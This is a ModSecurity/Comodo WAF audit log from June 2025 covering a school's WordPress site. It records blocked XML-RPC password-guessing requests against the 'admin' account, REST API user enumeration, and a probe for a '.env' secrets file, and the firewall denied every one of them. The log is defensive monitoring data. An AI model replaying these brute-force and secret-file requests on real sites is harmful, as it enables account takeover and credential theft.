[tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862417339769 4754 (- - -) Stopwatch2: 1749862417339769 4754; combined=3470, p1=420, p2=2828, p3=0, p4=0, p5=124, sr=125, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce60ac1b-Z-- --92486649-A-- [14/Jun/2025:07:54:51 +0700] aEzIW0MWfhkd5Y0sFtrnpAAAAJY 103.236.140.4 56188 103.236.140.4 8181 --92486649-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --92486649-C-- wp.getUsersBlogs admin admin2008 --92486649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92486649-E-- --92486649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862491268553 5188 (- - -) Stopwatch2: 1749862491268553 5188; combined=3687, p1=450, p2=3054, p3=0, p4=0, p5=106, sr=90, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92486649-Z-- --5d7be66c-A-- [14/Jun/2025:07:55:51 +0700] aEzIl2mwZ6YUkjOdtI7AkgAAABU 103.236.140.4 56274 103.236.140.4 8181 --5d7be66c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5d7be66c-C-- wp.getUsersBlogs admin admin2005 --5d7be66c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d7be66c-E-- --5d7be66c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862551005808 5361 (- - -) Stopwatch2: 1749862551005808 5361; combined=3788, p1=453, p2=3142, p3=0, p4=0, p5=111, sr=93, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d7be66c-Z-- --69e9f16a-A-- [14/Jun/2025:07:56:05 +0700] aEzIpWmwZ6YUkjOdtI7AlAAAABA 103.236.140.4 56278 103.236.140.4 8181 --69e9f16a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.83.240.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.83.240.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --69e9f16a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e9f16a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749862565807452 3169 (- - -) Stopwatch2: 1749862565807452 3169; combined=1391, p1=471, p2=884, p3=0, p4=0, p5=36, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e9f16a-Z-- --c2f51f74-A-- [14/Jun/2025:07:56:51 +0700] aEzI02IDXuKmWNi2UBSykQAAAEw 103.236.140.4 56336 103.236.140.4 8181 --c2f51f74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2f51f74-C-- wp.getUsersBlogs admin Marketing2018_ --c2f51f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2f51f74-E-- --c2f51f74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862611231891 4782 (- - -) Stopwatch2: 1749862611231891 4782; combined=3582, p1=429, p2=2904, p3=0, p4=0, p5=167, sr=125, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2f51f74-Z-- --22c2e671-A-- [14/Jun/2025:07:57:39 +0700] aEzJA2mwZ6YUkjOdtI7AnwAAAAs 103.236.140.4 56362 103.236.140.4 8181 --22c2e671-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --22c2e671-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22c2e671-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749862659943634 849 (- - -) Stopwatch2: 1749862659943634 849; combined=346, p1=304, p2=0, p3=0, p4=0, p5=42, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22c2e671-Z-- --3ae1f645-A-- [14/Jun/2025:07:57:56 +0700] aEzJFF3g_boun6Rx5jLNwgAAAMM 103.236.140.4 56366 103.236.140.4 8181 --3ae1f645-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3ae1f645-C-- wp.getUsersBlogs admin admin@1984 --3ae1f645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae1f645-E-- --3ae1f645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (7+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862676700523 5418 (- - -) Stopwatch2: 1749862676700523 5418; combined=3856, p1=457, p2=3191, p3=0, p4=0, p5=119, sr=86, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae1f645-Z-- --cb26121e-A-- [14/Jun/2025:07:59:03 +0700] aEzJV13g_boun6Rx5jLNxgAAAMg 103.236.140.4 56418 103.236.140.4 8181 --cb26121e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cb26121e-C-- wp.getUsersBlogs admin marketing2017_ --cb26121e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb26121e-E-- --cb26121e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862743442059 5519 (- - -) Stopwatch2: 1749862743442059 5519; combined=3908, p1=502, p2=3176, p3=0, p4=0, p5=130, sr=90, sw=100, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb26121e-Z-- --18b0c655-A-- [14/Jun/2025:08:00:03 +0700] aEzJk2mwZ6YUkjOdtI7ArAAAABc 103.236.140.4 56580 103.236.140.4 8181 --18b0c655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --18b0c655-C-- wp.getUsersBlogs admin smkn22-jkt.sch.id123456 --18b0c655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18b0c655-E-- --18b0c655-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862803522813 5150 (- - -) Stopwatch2: 1749862803522813 5150; combined=3629, p1=466, p2=2984, p3=0, p4=0, p5=104, sr=83, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18b0c655-Z-- --eab4d00e-A-- [14/Jun/2025:08:01:21 +0700] aEzJ4V3g_boun6Rx5jLOEwAAAM0 103.236.140.4 56650 103.236.140.4 8181 --eab4d00e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eab4d00e-C-- wp.getUsersBlogs admin temp --eab4d00e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab4d00e-E-- --eab4d00e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862881419139 5447 (- - -) Stopwatch2: 1749862881419139 5447; combined=3872, p1=500, p2=3148, p3=0, p4=0, p5=127, sr=97, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab4d00e-Z-- --12cbcd13-A-- [14/Jun/2025:08:02:21 +0700] aEzKHWIDXuKmWNi2UBSyuwAAAEg 103.236.140.4 56730 103.236.140.4 8181 --12cbcd13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --12cbcd13-C-- wp.getUsersBlogs admin admin9876 --12cbcd13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12cbcd13-E-- --12cbcd13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862941231952 4264 (- - -) Stopwatch2: 1749862941231952 4264; combined=3296, p1=369, p2=2739, p3=0, p4=0, p5=107, sr=82, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12cbcd13-Z-- --b36b391d-A-- [14/Jun/2025:08:03:21 +0700] aEzKWWmwZ6YUkjOdtI7A7gAAAAQ 103.236.140.4 56838 103.236.140.4 8181 --b36b391d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b36b391d-C-- wp.getUsersBlogs admin aaa111 --b36b391d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b36b391d-E-- --b36b391d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863001719590 4195 (- - -) Stopwatch2: 1749863001719590 4195; combined=3235, p1=353, p2=2706, p3=0, p4=0, p5=101, sr=80, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b36b391d-Z-- --d364dc15-A-- [14/Jun/2025:08:04:23 +0700] aEzKl2IDXuKmWNi2UBSy4wAAAEU 103.236.140.4 56944 103.236.140.4 8181 --d364dc15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d364dc15-C-- wp.getUsersBlogs admin campus --d364dc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d364dc15-E-- --d364dc15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863063951093 6042 (- - -) Stopwatch2: 1749863063951093 6042; combined=4133, p1=559, p2=3399, p3=0, p4=0, p5=104, sr=102, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d364dc15-Z-- --71484c6b-A-- [14/Jun/2025:08:05:44 +0700] aEzK6GIDXuKmWNi2UBSzEwAAAEs 103.236.140.4 57060 103.236.140.4 8181 --71484c6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --71484c6b-C-- wp.getUsersBlogs admin qweasdzx --71484c6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71484c6b-E-- --71484c6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863144059667 5152 (- - -) Stopwatch2: 1749863144059667 5152; combined=3679, p1=445, p2=3062, p3=0, p4=0, p5=100, sr=83, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71484c6b-Z-- --527f957a-A-- [14/Jun/2025:08:06:49 +0700] aEzLKWmwZ6YUkjOdtI7BAQAAAAY 103.236.140.4 57146 103.236.140.4 8181 --527f957a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --527f957a-C-- wp.getUsersBlogs admin unknown --527f957a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --527f957a-E-- --527f957a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863209960535 5313 (- - -) Stopwatch2: 1749863209960535 5313; combined=3738, p1=451, p2=3106, p3=0, p4=0, p5=105, sr=82, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --527f957a-Z-- --ea55a77e-A-- [14/Jun/2025:08:06:54 +0700] aEzLLkMWfhkd5Y0sFtrn2wAAAIc 103.236.140.4 57170 103.236.140.4 8181 --ea55a77e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.37.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.37.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ea55a77e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea55a77e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749863214609329 2499 (- - -) Stopwatch2: 1749863214609329 2499; combined=1136, p1=376, p2=732, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea55a77e-Z-- --710fee0b-A-- [14/Jun/2025:08:07:48 +0700] aEzLZEMWfhkd5Y0sFtrn-AAAAI0 103.236.140.4 57234 103.236.140.4 8181 --710fee0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --710fee0b-C-- wp.getUsersBlogs admin 1234%^&* --710fee0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --710fee0b-E-- --710fee0b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 